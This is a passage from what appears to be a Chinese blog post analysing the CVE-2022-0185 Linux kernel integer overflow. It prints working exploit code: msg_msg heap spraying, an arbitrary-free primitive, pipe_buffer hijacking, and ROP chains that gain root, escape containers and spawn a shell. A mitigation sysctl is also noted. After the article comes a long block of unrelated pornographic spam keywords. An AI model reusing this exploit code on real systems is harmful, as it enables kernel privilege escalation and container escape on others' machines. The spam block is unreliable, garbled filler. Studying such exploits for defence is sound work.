kmalloc_1024;leaks.kmalloc_512_leak = kmalloc_512;return leaks; }

有了這些信息,就能控制 pipe_buffer->ops。

4-2 篡改 pipe_buffer->ops

方法一unlink:作者首先嘗試了unlink attack,在 do_msgrcv() 中,不指定 MSG_COPY 就會(huì)執(zhí)行 unlink operation ,直觀來(lái)說(shuō)就是執(zhí)行 victim->prev->next = victim->next 和 victim->next->prev = victim->prev,如果設(shè)置 victim->prev 指向 pipe_buffer->ops 的位置,設(shè)置victim->next 指向 kmalloc-512 內(nèi)部(可控),這樣就能將 pipe_buffer->ops 篡改指向偽造的函數(shù)表,unlink流程如下所示:

問(wèn)題-unlink check:內(nèi)核開(kāi)啟了 CONFIG_DEBUG_LIST ,會(huì)調(diào)用 __list_del_entry_valid() 對(duì)unlink進(jìn)行檢查,檢查不通過(guò)則不會(huì)進(jìn)行unlink(但還是會(huì)進(jìn)行釋放,原來(lái)的指針會(huì)被設(shè)置為 POISON 值)

bool __list_del_entry_valid(struct list_head *entry) {struct list_head *prev, *next;prev = entry->prev;next = entry->next;if (CHECK_DATA_CORRUPTION(next == LIST_POISON1,"list_del corruption, %px->next is LIST_POISON1 (%px)\n",entry, LIST_POISON1) ||CHECK_DATA_CORRUPTION(prev == LIST_POISON2,"list_del corruption, %px->prev is LIST_POISON2 (%px)\n",entry, LIST_POISON2) ||CHECK_DATA_CORRUPTION(prev->next != entry,"list_del corruption. prev->next should be %px, but was %px\n",entry, prev->next) ||CHECK_DATA_CORRUPTION(next->prev != entry,"list_del corruption. next->prev should be %px, but was %px\n",entry, next->prev))return false;return true; }

方法二任意釋放:但我們已經(jīng)泄露了堆地址,即使unlink失敗了也可以將鏈表指針改為有效的值,繼續(xù)覆寫 msg_msg->next 指針和 msg_msg->security 指針來(lái)構(gòu)造任意釋放。由于payload必須為有效的字符串,我們可以根據(jù)泄露的堆地址進(jìn)行非對(duì)齊釋放( msg_msg->next = &kmalloc-1k - 0x20 / msg_msg->security = &kmalloc-512 - 0x20 ,關(guān)鍵是釋放前者,后者不重要),釋放 &kmalloc-1k - 0x20 之后,再分配一個(gè) kmalloc-1k 大小的 msg_msg 來(lái)篡改 pipe_buffer->ops 指向存放 stack pivot gadget 的地方,同時(shí)避免觸發(fā) hardened usercopy bound checks。

4k msg_msg 的偽造流程如下:

接著,釋放 4k msg_msg 并堆噴1k msg_msg 以篡改被釋放的 pipe_buffer :

4-3 ROP 構(gòu)造并提權(quán)

ROP位置:關(guān)閉 pipefd 就能觸發(fā)執(zhí)行 stack pivot,但此時(shí)發(fā)現(xiàn)沒(méi)有寄存器指向 kmalloc-512 內(nèi)部,RAX指向 pipe_buffer 開(kāi)頭(kmalloc-1k),這意味著我們要在 pipe_buffer 上布置 ROP chain,我們的 stack pivot 需要將rsp改成rax。

可用的 gadget

  • mov rsp, rax ; pop rbp ; ret; —— stack pivot
  • pop rdi ; ret ;
  • pop rsi ; ret ;
  • test esi, esi ; cmovne rdi, rax ; mov rax, qword [rdi] ; pop rbp ; ret ; —— rdi = rax

ROP構(gòu)造:ROP鏈的目標(biāo)是擁有root namespace 中的root權(quán)限,可直接利用 CVE-2021-22555 中的ROP chain來(lái)執(zhí)行 commit_cred(prepare_kernel_cred(NULL)) 和 switch_task_namespaces(find_task_by_vpid(1), init_nsproxy) ,最后調(diào)用 swapgs_and_return_to_userspace 返回用戶空間,最后執(zhí)行常規(guī)的容器逃逸步驟( setns tricks )。

以下代碼能夠提權(quán)和容器逃逸:

void dump_flag() {char buf[200] = {0};for (int i = 0; i < 4194304; i++) {// bruteforce root namespace pid equivalent of the other container's sleep processsnprintf(buf, sizeof(buf), "/proc/%d/root/flag/flag", i);int fd = open(buf, O_RDONLY);if (fd < 0) {continue;}puts("🎲🎲🎲🎲🎲🎲🎲🎲🎲🎲");read(fd, buf, 100);write(1, buf, 100);puts("🎲🎲🎲🎲🎲🎲🎲🎲🎲🎲");close(fd);}return; }__attribute__((naked)) win() {// thanks movaps sooooooo muchasm volatile("mov rbp, rsp;""and rsp, -0xf;""call dump_flag;""mov rsp, rbp;""ret;"); }void pwned() {write(1, "ROOOOOOOOOOOT\n", 14);setns(open("/proc/1/ns/mnt", O_RDONLY), 0);setns(open("/proc/1/ns/pid", O_RDONLY), 0);setns(open("/proc/1/ns/net", O_RDONLY), 0);win();char *args[] = {"/bin/sh", NULL};execve("/bin/sh", args, NULL);_exit(0); }void do_win(uint64_t kmalloc_512, uint64_t kmalloc_1024) {int size = 0x1000;int target = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);char buffer[0x2000] = {0}, recieved[0x2000] = {0};char pat[0x40] = {0};msg* message = (msg*)buffer;memset(buffer, 0x44, sizeof(buffer));int ready = 0;int ignition_target = -1;// doesn't matter as long as valid pointersuint64_t next_target = kmalloc_1024 + 0x440;uint64_t prev_target = kmalloc_512 + 0x440;// set up arb free primitive, avoid tripping hardened usercopy when re-alloc with msg_msguint64_t free_target = kmalloc_1024 - 0x20;uint64_t make_sec_happy = kmalloc_512 - 0x20;stuff_4k(16);int targets[P_SPRAY] = {0};while (!ready){for (int i = 0; i < P_SPRAY; i++) {memset(buffer, 0x41+i, sizeof(buffer));targets[i] = make_queue(IPC_PRIVATE, 0666 | IPC_CREAT);send_msg(targets[i], message, size - 0x30, 0);}get_msg(targets[0], recieved, size-0x30, 0, IPC_NOWAIT | MSG_NOERROR | MSG_COPY);// misaligned arb free attackfd = fsopen("ext4", 0);if (fd < 0) {puts("Opening");exit(-1);}strcpy(pat, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");for (int i = 0; i < 117; i++) {fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);}puts("[*] Done heap overflow");char evil[0x40] = {0};uint64_t *evil_ptr = (uint64_t *)evil;memset(evil, 0x41, 0x30);evil_ptr[0] = next_target;evil_ptr[1] = prev_target;evil_ptr[4] = free_target;evil_ptr[5] = make_sec_happy;// in case null bytes in addressesif(strlen(evil) != 0x30){puts("unable to continue given heap addresses");exit(-1);}puts("[*] Overflowing...");fsconfig(fd, FSCONFIG_SET_STRING, evil, "\x00", 0);puts("check heap to check preparedness for ignition");stuff_4k(16);for (int i = 0; i < P_SPRAY; i++){memset(recieved, 0, sizeof(recieved));// rely on error code to determine if we have found our target which we overflowed intoint ret = get_msg_no_err(targets[i], recieved, size+0x50-0x30, 0, IPC_NOWAIT | MSG_NOERROR | MSG_COPY);if (ret < 0){ready = 1;ignition_target = i;break;}}if (!ready){puts("nothing ready for ignition, trying again");// re-stuff freelist and stabilizestuff_4k(16);}}char overwrite[0x300] = {0};memset(overwrite, 0x41, sizeof(overwrite));uint64_t *overwrite_ptr = (uint64_t *)overwrite;// redirect to "table" of stack pivotsoverwrite_ptr[1] = kmalloc_512 + 0x50;uint64_t user_rflags, user_cs, user_ss, user_sp;asm volatile("mov %0, %%cs\n""mov %1, %%ss\n""mov %2, %%rsp\n""pushfq\n""pop %3\n": "=r" (user_cs), "=r" (user_ss), "=r" (user_sp), "=r" (user_rflags));uint64_t chain[] = {pop_rdi,0,prepare_kernel_cred,pop_rsi,0xbaadbabe,cmov_rdi_rax_esi_nz_pop_rbp,0xdeadbeef,commit_creds,pop_rdi,1,find_task_by_vpid,pop_rsi,0xbaadbabe,cmov_rdi_rax_esi_nz_pop_rbp,0xdeadbeef,pop_rsi,init_nsproxy,switch_task_namespaces,kpti_trampoline,0xdeadbeef,0xbaadf00d,(uint64_t)pwned,user_cs,user_rflags,user_sp & 0xffffffffffffff00,user_ss,};memcpy(&overwrite_ptr[2], chain, sizeof(chain));for (int i = 0; i < P_SPRAY; i++){get_msg(targets[i], recieved, size-0x30, 0, IPC_NOWAIT | MSG_NOERROR);}// spray rop chain plus evil vtable ptr to overlap with pipe_bufferfor (int i = 0; i < ROP_SPRAY; i++){send_msg(rop_msg_qid[i], overwrite, 0x300 - 0x30, 0);}deplete_512();deplete_4k();puts("[*] Attempt at igniting ROP!");// triggerfor (int i = 0; i < PIPES; i++){close(pipefd[i][0]);close(pipefd[i][1]);}}

讀取flag:為了找到其他容器的flag,作者直接嘗試獲取 /proc/pid/root/flag/flag (暴搜pid)。

缺點(diǎn):需要三次觸發(fā)漏洞,堆噴不一定穩(wěn)定。

4-4 改進(jìn)exploit

劫持RIP時(shí)的上下文:在調(diào)用執(zhí)行 pipe_buffer->ops->release() 時(shí),我們的環(huán)境中是 RSI 指向 pipe_buffer。所以需要修改一下ROP鏈。主要參考 CVE-2021-22555 中用到的一個(gè) stack pivot gadget —— push rsi; jmp qword ptr [rsi + 0x39],這樣可以在 pipe_buffer+0x39 處放置一個(gè) pop rsp 來(lái)劫持棧。

完整ROP鏈

void build_krop(char *buf) {uint64_t *rop;*(uint64_t *)&buf[0x39] = pop_rsp; *(uint64_t *)&buf[0x00] = add_rsp_0xd0; rop = (uint64_t *)&buf[0xD8];*rop++ = pop_rdi;*rop++ = 0;*rop++ = prepare_kernel_cred;*rop++ = mov_rdi_rax_pop_pop;*rop++ = 0xdeadbeef;*rop++ = 0xdeadbeef;*rop++ = commit_creds;*rop++ = pop_rdi;*rop++ = 1;*rop++ = find_task_by_vpid;*rop++ = mov_rdi_rax_pop_pop;*rop++ = 0xdeadbeef;*rop++ = 0xdeadbeef;*rop++ = pop_rsi;*rop++ = init_nsproxy;*rop++ = switch_task_namespaces;*rop++ = kpti_trampoline;*rop++ = 0xdeadbeef;*rop++ = 0xbaadf00d;*rop++ = (uint64_t)pwned;*rop++ = user_cs;*rop++ = user_rflags;*rop++ = user_sp & 0xffffffffffffff00;*rop++ = user_ss; }

提權(quán)截圖


注意:5.7 版本以后的內(nèi)核使得堆利用更穩(wěn)定了。如果 freelist pointer 在chunk的開(kāi)頭,堆噴成功率不超過(guò)50%,但是5.7版本以后將 freelist pointer 挪到 chunk中間( move the freelist pointer to the middle )以避免堆溢出的危害,這意味著只要堆溢出不會(huì)破壞重要的數(shù)據(jù)結(jié)構(gòu),我們可以在4k頁(yè)中溢出很長(zhǎng)也不會(huì)破壞堆狀態(tài)(msg_msg需要溢出覆蓋前0x30字節(jié)),便于泄露內(nèi)存和實(shí)現(xiàn)任意寫。

作者寫了兩個(gè)exp,一個(gè)用于Ubuntu 20.04 的提權(quán)——exploit_fuse.c(5.7以后版本都很好利用,-p提權(quán)),一個(gè)用于google的Kubernets集群的 KCTF環(huán)境——exploit_kctf.c 。

臨時(shí)防護(hù):Ubuntu中可以禁用命名空間

sysctl -w kernel.unprivileged_userns_clone=0

PS:作者的第2種利用方法,需要觸發(fā)漏洞三次,可能導(dǎo)致堆噴不穩(wěn)定,結(jié)果發(fā)現(xiàn)提權(quán)很穩(wěn)定。可能是作者先申請(qǐng)了 4096 個(gè)位于 kmalloc-4096 的 msg_msg,然后每觸發(fā)一次都會(huì)釋放一部分 msg_msg—— 調(diào)用stuff_4k(16),只能說(shuō)作者太厲害了,這么嘗試的話我會(huì)崩潰的。。。可以改進(jìn)一下只觸發(fā)兩次漏洞完成提權(quán),一次泄露堆地址,一次用來(lái)構(gòu)造任意釋放,構(gòu)造兩塊重疊的 0x400 堆塊,用 SKB泄露pipe_buffer中的內(nèi)核基地址,然后利用SKB堆噴偽造 pipe_buffer 劫持控制流。


參考

CVE-2022-0185: A Case Study

CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google’s KCTF Containers

FUSE利用技術(shù) —— [slideshow](https://static.sched.com/hosted_files/lsseu2019/04/LSSEU2019 - Exploiting race conditions on Linux.pdf) / FUSE technique

[漏洞分析] CVE-2022-0185 linux 內(nèi)核提權(quán)(逃逸)

CVE-2022-0185:Linux kernel bug可實(shí)現(xiàn)Kubernetes容器逃逸

總結(jié)

以上是生活随笔為你收集整理的CVE-2022-0185 价值$3w的 File System Context 内核整数溢出漏洞利用分析的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

精品人人妻人人澡人人爽人人 | 国产精品视频免费播放 | 日本一卡二卡不卡视频查询 | 日本一卡二卡不卡视频查询 | 成人综合网亚洲伊人 | 牲欲强的熟妇农村老妇女 | 扒开双腿吃奶呻吟做受视频 | 亚洲 激情 小说 另类 欧美 | 国产亚洲人成a在线v网站 | 国产人妻精品一区二区三区不卡 | 久久国产自偷自偷免费一区调 | 亚洲а∨天堂久久精品2021 | 国产无遮挡又黄又爽又色 | 亚洲色欲久久久综合网东京热 | 性生交大片免费看女人按摩摩 | 99麻豆久久久国产精品免费 | 国产卡一卡二卡三 | 国产精品第一区揄拍无码 | 日本丰满护士爆乳xxxx | 亚洲国产高清在线观看视频 | 一本久久a久久精品亚洲 | 玩弄人妻少妇500系列视频 | 老熟妇仑乱视频一区二区 | 无遮挡啪啪摇乳动态图 | 水蜜桃色314在线观看 | 少妇厨房愉情理9仑片视频 | 亚洲色偷偷偷综合网 | 成人精品一区二区三区中文字幕 | 亚洲va欧美va天堂v国产综合 | 精品厕所偷拍各类美女tp嘘嘘 | 国产精品99久久精品爆乳 | 亚洲精品中文字幕乱码 | 性生交大片免费看女人按摩摩 | 中文字幕+乱码+中文字幕一区 | 久久久成人毛片无码 | 亚洲欧美国产精品专区久久 | 少妇人妻偷人精品无码视频 | 男女超爽视频免费播放 | 无码人妻精品一区二区三区下载 | 精品人人妻人人澡人人爽人人 | 久久99精品久久久久久动态图 | 无码av岛国片在线播放 | 久激情内射婷内射蜜桃人妖 | 精品国产成人一区二区三区 | 国产成人精品久久亚洲高清不卡 | 免费中文字幕日韩欧美 | 精品国产一区二区三区四区在线看 | 国产av久久久久精东av | 久久久精品国产sm最大网站 | 欧美黑人巨大xxxxx | 亚洲中文字幕av在天堂 | 国产亚洲欧美在线专区 | 亚洲男人av香蕉爽爽爽爽 | 奇米影视888欧美在线观看 | 在线天堂新版最新版在线8 | 亚洲精品久久久久中文第一幕 | 国产极品视觉盛宴 | 久久久久99精品国产片 | 激情五月综合色婷婷一区二区 | 久久久久免费精品国产 | 精品人妻中文字幕有码在线 | 国产办公室秘书无码精品99 | 少女韩国电视剧在线观看完整 | 国产无av码在线观看 | 欧美日韩亚洲国产精品 | 偷窥日本少妇撒尿chinese | 高清无码午夜福利视频 | 强辱丰满人妻hd中文字幕 | 国产欧美精品一区二区三区 | 国产精品久久久久久无码 | 啦啦啦www在线观看免费视频 | 欧美日韩久久久精品a片 | www成人国产高清内射 | 强开小婷嫩苞又嫩又紧视频 | 亚洲精品国产a久久久久久 | 成人免费无码大片a毛片 | 狠狠色丁香久久婷婷综合五月 | av无码不卡在线观看免费 | 亚洲成色在线综合网站 | 日韩在线不卡免费视频一区 | 日本熟妇乱子伦xxxx | 一二三四在线观看免费视频 | 亚洲综合久久一区二区 | 国产卡一卡二卡三 | 俺去俺来也在线www色官网 | 国产精品无码久久av | 亚洲国产成人a精品不卡在线 | 小sao货水好多真紧h无码视频 | 亚洲毛片av日韩av无码 | 亚洲精品无码国产 | 三上悠亚人妻中文字幕在线 | 久久精品中文字幕大胸 | 久久综合九色综合欧美狠狠 | 色一情一乱一伦 | 图片区 小说区 区 亚洲五月 | 黑人大群体交免费视频 | 国产激情一区二区三区 | 蜜臀av无码人妻精品 | 无码福利日韩神码福利片 | 欧美一区二区三区视频在线观看 | 欧美大屁股xxxxhd黑色 | 东京热一精品无码av | 久久久亚洲欧洲日产国码αv | 激情内射亚州一区二区三区爱妻 | 男人和女人高潮免费网站 | 日韩欧美中文字幕在线三区 | 99久久精品国产一区二区蜜芽 | 中文字幕乱妇无码av在线 | 日本又色又爽又黄的a片18禁 | 国产suv精品一区二区五 | 婷婷色婷婷开心五月四房播播 | 内射老妇bbwx0c0ck | 性欧美牲交xxxxx视频 | 狂野欧美性猛xxxx乱大交 | 欧美35页视频在线观看 | 亚洲国产高清在线观看视频 | 黄网在线观看免费网站 | 欧美35页视频在线观看 | 无遮挡啪啪摇乳动态图 | 国产人妻精品午夜福利免费 | 最近免费中文字幕中文高清百度 | 欧美日韩色另类综合 | 国产精品鲁鲁鲁 | 亚洲gv猛男gv无码男同 | 亚洲欧美日韩综合久久久 | 国产香蕉97碰碰久久人人 | 国产午夜无码视频在线观看 | 精品aⅴ一区二区三区 | 色综合天天综合狠狠爱 | 日本一区二区三区免费高清 | 无码免费一区二区三区 | 强开小婷嫩苞又嫩又紧视频 | 精品国产一区二区三区四区在线看 | 狠狠cao日日穞夜夜穞av | 欧美一区二区三区 | 亚洲高清偷拍一区二区三区 | 中文字幕乱码人妻二区三区 | 精品厕所偷拍各类美女tp嘘嘘 | 亚洲色www成人永久网址 | 精品亚洲韩国一区二区三区 | 国产在热线精品视频 | 久久这里只有精品视频9 | 荫蒂被男人添的好舒服爽免费视频 | 国产精品久久久 | 香港三级日本三级妇三级 | 国产成人无码av一区二区 | 精品偷自拍另类在线观看 | 天天躁日日躁狠狠躁免费麻豆 | 国产成人精品视频ⅴa片软件竹菊 | 亚洲精品午夜无码电影网 | 天堂在线观看www | 麻豆人妻少妇精品无码专区 | 久久久www成人免费毛片 | 2020最新国产自产精品 | 亚洲日韩中文字幕在线播放 | 国内综合精品午夜久久资源 | 蜜桃无码一区二区三区 | 午夜无码区在线观看 | 欧美一区二区三区视频在线观看 | 99久久久国产精品无码免费 | 熟妇激情内射com | 国产人妻大战黑人第1集 | 少妇高潮喷潮久久久影院 | 欧美 丝袜 自拍 制服 另类 | 老子影院午夜伦不卡 | 无码av中文字幕免费放 | 国产成人无码av一区二区 | 激情亚洲一区国产精品 | 性欧美牲交xxxxx视频 | 午夜精品一区二区三区在线观看 | 无码av最新清无码专区吞精 | 综合激情五月综合激情五月激情1 | 免费国产成人高清在线观看网站 | 中文无码成人免费视频在线观看 | 欧美人与牲动交xxxx | 亚洲の无码国产の无码步美 | 亚洲国产精品美女久久久久 | 国产片av国语在线观看 | 美女毛片一区二区三区四区 | 亚洲国产精品美女久久久久 | 国产精品亚洲五月天高清 | 日日鲁鲁鲁夜夜爽爽狠狠 | 精品无码国产一区二区三区av | 国产激情无码一区二区app | 久久精品99久久香蕉国产色戒 | 免费国产黄网站在线观看 | 性欧美牲交xxxxx视频 | 18禁止看的免费污网站 | 亚洲成a人片在线观看无码 | 男女性色大片免费网站 | 久久99精品国产.久久久久 | 亚洲の无码国产の无码步美 | 性啪啪chinese东北女人 | 中文字幕av伊人av无码av | 国产精品久久久 | 无套内谢的新婚少妇国语播放 | 亚拍精品一区二区三区探花 | 国产激情艳情在线看视频 | 日本精品人妻无码免费大全 | 免费人成在线观看网站 | 日韩人妻系列无码专区 | 人妻无码αv中文字幕久久琪琪布 | 青青青手机频在线观看 | 红桃av一区二区三区在线无码av | 曰本女人与公拘交酡免费视频 | 亚洲狠狠婷婷综合久久 | 熟妇女人妻丰满少妇中文字幕 | 在教室伦流澡到高潮hnp视频 | 极品嫩模高潮叫床 | 国内少妇偷人精品视频免费 | 色诱久久久久综合网ywww | 久久久国产一区二区三区 | 天天拍夜夜添久久精品 | 天天拍夜夜添久久精品大 | 色综合久久久无码中文字幕 | 国产无av码在线观看 | 无码人妻av免费一区二区三区 | 日本一卡2卡3卡四卡精品网站 | 初尝人妻少妇中文字幕 | 亚洲成av人综合在线观看 | 300部国产真实乱 | yw尤物av无码国产在线观看 | 装睡被陌生人摸出水好爽 | 黑人巨大精品欧美一区二区 | 中文字幕无码av激情不卡 | 国产香蕉尹人综合在线观看 | 亚洲の无码国产の无码步美 | 激情内射亚州一区二区三区爱妻 | 日日干夜夜干 | 精品熟女少妇av免费观看 | 国产欧美精品一区二区三区 | 欧美精品国产综合久久 | 日韩视频 中文字幕 视频一区 | 人人爽人人爽人人片av亚洲 | 亚洲七七久久桃花影院 | 伊人久久大香线蕉av一区二区 | www国产亚洲精品久久网站 | 少妇一晚三次一区二区三区 | 成 人影片 免费观看 | 国产一区二区三区影院 | 国产人妖乱国产精品人妖 | 亚洲精品一区二区三区婷婷月 | 少妇愉情理伦片bd | 中文字幕av伊人av无码av | 黑人粗大猛烈进出高潮视频 | 国产乡下妇女做爰 | 娇妻被黑人粗大高潮白浆 | 欧美阿v高清资源不卡在线播放 | 亚洲人成影院在线观看 | 亚洲一区二区三区香蕉 | 午夜精品一区二区三区在线观看 | 亚洲成av人在线观看网址 | 天海翼激烈高潮到腰振不止 | 99久久精品日本一区二区免费 | 国产特级毛片aaaaaaa高清 | 亚洲欧美色中文字幕在线 | 国产麻豆精品精东影业av网站 | 亚洲国产一区二区三区在线观看 | 熟妇人妻激情偷爽文 | 国产内射老熟女aaaa | 色妞www精品免费视频 | 久久精品国产99久久6动漫 | 性啪啪chinese东北女人 | 亚洲人成影院在线观看 | 亚洲国产av精品一区二区蜜芽 | 水蜜桃亚洲一二三四在线 | 久久99久久99精品中文字幕 | 人妻中文无码久热丝袜 | 99精品无人区乱码1区2区3区 | 亚洲精品久久久久avwww潮水 | 四虎影视成人永久免费观看视频 | 亚洲熟妇色xxxxx欧美老妇y | 亚洲爆乳大丰满无码专区 | 成在人线av无码免观看麻豆 | 蜜桃视频插满18在线观看 | 日韩精品久久久肉伦网站 | 精品无码一区二区三区爱欲 | 久久久久久国产精品无码下载 | 国内精品久久毛片一区二区 | 色综合久久88色综合天天 | 丝袜足控一区二区三区 | 国产亚洲精品久久久久久 | 国产av剧情md精品麻豆 | 沈阳熟女露脸对白视频 | 成人影院yy111111在线观看 | 曰韩无码二三区中文字幕 | 成人无码影片精品久久久 | 欧美熟妇另类久久久久久多毛 | 女人被男人爽到呻吟的视频 | www国产亚洲精品久久久日本 | 国产精品久久久久久亚洲毛片 | 久久www免费人成人片 | 领导边摸边吃奶边做爽在线观看 | 一二三四在线观看免费视频 | 乱码av麻豆丝袜熟女系列 | 丰满肥臀大屁股熟妇激情视频 | 亚洲欧洲中文日韩av乱码 | 中国女人内谢69xxxx | 九九热爱视频精品 | 亚洲大尺度无码无码专区 | 亚洲人成网站在线播放942 | 少妇被黑人到高潮喷出白浆 | 亚洲乱码国产乱码精品精 | 久久久亚洲欧洲日产国码αv | 日本一卡二卡不卡视频查询 | 日韩欧美群交p片內射中文 | 欧美老妇交乱视频在线观看 | 999久久久国产精品消防器材 | 人妻无码αv中文字幕久久琪琪布 | 一本大道久久东京热无码av | 精品国偷自产在线 | 无码福利日韩神码福利片 | 中文字幕av日韩精品一区二区 | 天天综合网天天综合色 | 国产真实乱对白精彩久久 | 人妻尝试又大又粗久久 | 老熟女重囗味hdxx69 | 国内丰满熟女出轨videos | 伊人久久大香线焦av综合影院 | 亚洲中文字幕成人无码 | 日韩在线不卡免费视频一区 | 日韩精品久久久肉伦网站 | 亚洲国产精品美女久久久久 | 亚洲国产精品一区二区美利坚 | 98国产精品综合一区二区三区 | 小泽玛莉亚一区二区视频在线 | 国产成人一区二区三区在线观看 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 18禁止看的免费污网站 | 久久亚洲日韩精品一区二区三区 | 精品一区二区三区无码免费视频 | 老子影院午夜精品无码 | 久久久久久久人妻无码中文字幕爆 | 熟女俱乐部五十路六十路av | 亚洲色欲久久久综合网东京热 | 色欲av亚洲一区无码少妇 | 小鲜肉自慰网站xnxx | 在线天堂新版最新版在线8 | 亚洲国产精品久久久天堂 | 国语自产偷拍精品视频偷 | 中文字幕av伊人av无码av | 鲁大师影院在线观看 | 国产午夜精品一区二区三区嫩草 | 熟妇人妻无乱码中文字幕 | 久久综合九色综合欧美狠狠 | 51国偷自产一区二区三区 | 国产人妖乱国产精品人妖 | 久久久久久国产精品无码下载 | 欧美日本精品一区二区三区 | 久久婷婷五月综合色国产香蕉 | 久久无码专区国产精品s | 日日天干夜夜狠狠爱 | 精品人妻av区 | 水蜜桃色314在线观看 | 国产精品美女久久久 | 无码人妻丰满熟妇区五十路百度 | 欧美人与善在线com | 成人毛片一区二区 | 欧美肥老太牲交大战 | 高中生自慰www网站 | 婷婷综合久久中文字幕蜜桃三电影 | 国产亲子乱弄免费视频 | 国产激情一区二区三区 | 国产办公室秘书无码精品99 | 国产精品亚洲一区二区三区喷水 | 日产精品99久久久久久 | 一本大道伊人av久久综合 | 久久久久av无码免费网 | 国产舌乚八伦偷品w中 | 久久久久久久女国产乱让韩 | 1000部夫妻午夜免费 | 波多野结衣aⅴ在线 | 国产精品亚洲五月天高清 | 中文字幕无码免费久久9一区9 | 蜜臀aⅴ国产精品久久久国产老师 | 婷婷丁香六月激情综合啪 | 国产特级毛片aaaaaa高潮流水 | 白嫩日本少妇做爰 | 乱中年女人伦av三区 | 自拍偷自拍亚洲精品被多人伦好爽 | 国产亚洲精品精品国产亚洲综合 | 久久天天躁夜夜躁狠狠 | 疯狂三人交性欧美 | 亚洲成av人综合在线观看 | 激情内射亚州一区二区三区爱妻 | 在线播放免费人成毛片乱码 | 国产av无码专区亚洲awww | 丰满诱人的人妻3 | 丰满肥臀大屁股熟妇激情视频 | 美女毛片一区二区三区四区 | 少女韩国电视剧在线观看完整 | 狠狠色色综合网站 | 久久精品99久久香蕉国产色戒 | 少妇性l交大片 | 国内精品人妻无码久久久影院蜜桃 | 东京热男人av天堂 | 国产精品久久久久久亚洲毛片 | 国产精品人妻一区二区三区四 | 波多野结衣一区二区三区av免费 | 日韩亚洲欧美中文高清在线 | 精品一区二区三区无码免费视频 | √天堂资源地址中文在线 | 成人无码精品1区2区3区免费看 | 成人无码视频免费播放 | 国产小呦泬泬99精品 | 十八禁视频网站在线观看 | 日本一卡2卡3卡四卡精品网站 | 免费观看激色视频网站 | 免费男性肉肉影院 | 99久久久无码国产aaa精品 | 国产激情无码一区二区 | 少妇人妻av毛片在线看 | 成人欧美一区二区三区黑人免费 | 国产精品高潮呻吟av久久 | 蜜桃臀无码内射一区二区三区 | 无遮挡国产高潮视频免费观看 | 性做久久久久久久免费看 | 久久精品人人做人人综合试看 | 国产网红无码精品视频 | 欧美三级a做爰在线观看 | 色婷婷综合中文久久一本 | 又黄又爽又色的视频 | 日本丰满熟妇videos | 国产精品.xx视频.xxtv | 色一情一乱一伦一区二区三欧美 | 中文字幕av伊人av无码av | 国精产品一区二区三区 | 国产激情综合五月久久 | 麻豆国产丝袜白领秘书在线观看 | 极品尤物被啪到呻吟喷水 | 丰满人妻精品国产99aⅴ | 中文字幕无码热在线视频 | 网友自拍区视频精品 | 色综合久久久久综合一本到桃花网 | 丁香啪啪综合成人亚洲 | 国产av久久久久精东av | 无码人妻出轨黑人中文字幕 | 国产综合久久久久鬼色 | 日本高清一区免费中文视频 | 男女超爽视频免费播放 | 国产乱人无码伦av在线a | 色婷婷综合中文久久一本 | 日本欧美一区二区三区乱码 | 99在线 | 亚洲 | 精品少妇爆乳无码av无码专区 | 黑森林福利视频导航 | 无码国模国产在线观看 | 欧美一区二区三区视频在线观看 | 亚洲国产欧美日韩精品一区二区三区 | 日本乱偷人妻中文字幕 | 无码av岛国片在线播放 | 国产农村妇女aaaaa视频 撕开奶罩揉吮奶头视频 | 久久97精品久久久久久久不卡 | 久久国产36精品色熟妇 | 日韩人妻少妇一区二区三区 | 久久亚洲国产成人精品性色 | 奇米综合四色77777久久 东京无码熟妇人妻av在线网址 | 国产乱子伦视频在线播放 | 久久午夜夜伦鲁鲁片无码免费 | 偷窥日本少妇撒尿chinese | 成在人线av无码免费 | 欧美人与善在线com | 亚洲色欲色欲欲www在线 | 国产精品久久久久7777 | 亚洲成熟女人毛毛耸耸多 | 男女超爽视频免费播放 | 最近免费中文字幕中文高清百度 | 亚洲熟女一区二区三区 | 亚洲人成影院在线无码按摩店 | 国产凸凹视频一区二区 | 精品人妻人人做人人爽夜夜爽 | 国产无遮挡又黄又爽又色 | 亚洲精品综合一区二区三区在线 | 曰韩无码二三区中文字幕 | 无码av免费一区二区三区试看 | 无码乱肉视频免费大全合集 | 精品久久久中文字幕人妻 | 国产av剧情md精品麻豆 | 在线看片无码永久免费视频 | 国产精品-区区久久久狼 | 狠狠色色综合网站 | 精品国产精品久久一区免费式 | 十八禁真人啪啪免费网站 | 丰满肥臀大屁股熟妇激情视频 | √8天堂资源地址中文在线 | 欧美成人高清在线播放 | 无码一区二区三区在线 | 自拍偷自拍亚洲精品被多人伦好爽 | 久久国产36精品色熟妇 | 日本精品人妻无码77777 天堂一区人妻无码 | 西西人体www44rt大胆高清 | 少妇太爽了在线观看 | 国产午夜视频在线观看 | 99在线 | 亚洲 | 精品偷拍一区二区三区在线看 | 久久久久久a亚洲欧洲av冫 | aⅴ亚洲 日韩 色 图网站 播放 | 红桃av一区二区三区在线无码av | 日本一区二区三区免费播放 | 国产亚洲精品久久久久久久久动漫 | 国产av人人夜夜澡人人爽麻豆 | 亚洲另类伦春色综合小说 | 小鲜肉自慰网站xnxx | 少妇无套内谢久久久久 | 熟妇人妻中文av无码 | 高潮毛片无遮挡高清免费视频 | 亚洲性无码av中文字幕 | 午夜精品一区二区三区在线观看 | 欧洲熟妇色 欧美 | 亲嘴扒胸摸屁股激烈网站 | 亚洲娇小与黑人巨大交 | 99视频精品全部免费免费观看 | 中文字幕 人妻熟女 | 亚洲人成人无码网www国产 | 欧洲熟妇色 欧美 | 国产av久久久久精东av | 亚洲精品成a人在线观看 | 欧美xxxxx精品 | 少妇愉情理伦片bd | 色五月丁香五月综合五月 | 亚洲爆乳大丰满无码专区 | 色婷婷久久一区二区三区麻豆 | 久久久久成人精品免费播放动漫 | 成人欧美一区二区三区 | 人妻熟女一区 | 99久久99久久免费精品蜜桃 | 东京热无码av男人的天堂 | 国产麻豆精品一区二区三区v视界 | 国产日产欧产精品精品app | 国产乱人无码伦av在线a | 丰满肥臀大屁股熟妇激情视频 | 综合网日日天干夜夜久久 | 国产精品鲁鲁鲁 | 久久国产自偷自偷免费一区调 | 国产在线aaa片一区二区99 